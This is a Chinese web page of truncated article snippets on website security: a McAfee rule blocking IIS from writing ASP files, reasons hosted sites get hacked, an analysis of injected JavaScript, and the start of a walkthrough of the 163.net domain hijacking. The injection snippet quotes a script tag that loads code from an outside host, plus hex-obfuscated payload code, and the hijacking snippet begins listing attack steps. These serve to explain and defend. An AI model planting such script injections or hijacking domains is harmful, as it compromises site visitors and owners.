今天查看MCAFEE的日志时偶然发现，可以只阻挡IIS进程创建和修改ASP文件（本文以ASP文件为例，其他程序设置方法基本相同），这样我们用其他方法（比如直接在服务器上修改、通过FTP修改……）修改ASP文件就不会受影响。这样，这个规则再拦截非法操作的同时还不影响正常使用。规则见图：这样，就在不影响正常使用的情况下断绝了黑客上传木马干坏事的可能。这个方法可以给任何人使用，也适合主机商装给自己虚拟主机的服务器，保证服务器上用户的网站安全。基本上来说，这样设置之后即使是网站有任何漏洞，网站也不会被上传木马挂上非法代码、或者网站被删除、修改。需要注意的一点：因本规则将阻止IIS进程对任何.asp文件...

您的用户网站被黑,有以下几种原因造成的： 　1.　是您的客户的网站代码有问题，存在安全漏洞造成的。 　　　如果您的服务器上大部分用户的网站都正常，只有少量用户网站被黑，那 　　　么就很可能是您少量用户网站被黑的网站代码有问题，存在安全漏洞造 　　　成的。造成这个问题是没有办法解决，也不是您的责任。 　　　分析说明：　 　　　　　1）.　大家都知道，“虚拟主机提供商”对自己的每个虚拟主机用户 　　　　　　　　都分配了FSO文件操作的权限,他们通过您分配的合法权限，可 　　　　　　　　以任意改动和上传的任何文件。如果您...

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了，赶紧到服务器上查看所有文件是否带有这串js代码，搜索结果没有，而且服务器也没发现被入侵的痕迹。<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>于是只能从这段代码入手，我下载这个js开发发现是下面一段代码：[code]window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x5...

前段时间，163.net被黑，在业界搞的沸沸腾腾。其实，这不是他的错。错误在于Internic 。以下内容部分编译自  packetstorm.  163被黑的技术称为域名劫持（hijacked），技术上很简单，关键在于发一份用域名注册者email地址的确认信。。我们知  道：要进行域名变更，只需到www.networksolutions.com上进行。  比如我们要劫持163.net的，具体步骤如下：  1、打开浏览器，输入http://www.networksolutions.co...